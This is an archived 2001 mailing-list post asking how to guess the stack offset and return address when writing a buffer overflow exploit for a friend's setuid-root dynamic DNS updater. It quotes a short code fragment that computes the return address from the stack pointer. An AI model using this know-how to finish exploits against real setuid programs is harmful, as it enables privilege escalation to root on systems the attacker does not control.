hi folks, here i am again with a question on writing exploits! my problem is that in the last exploit i wrote the buffer i overflowed was the first variable in the program - so i was not further difficult to guess the offset. now i found a buffer overflow problem in a litte program my friend wrote - a dynamic dns entry updater (runs as setuid root). the variable is now no longer in first place. in my last exploit i used the function sp() to get the stack pointer and wanted the user to enter the offset. Now i calculated the return address subtraction the offset from the stack pointer. generally the value 0 was ok for the offset and my exploit worked as i wanted it. can anybody tell me how i can guess the offset and how to calculate the return address if the variable is not the first one in the program? piece of code from an exploit!! offset = atoi(argv[1]); esp = sp(); #get stack pointer ret = esp-offset; thanks, sniper sniperat_private
This archive was generated by hypermail 2b30 : Mon Jun 18 2001 - 09:53:57 PDT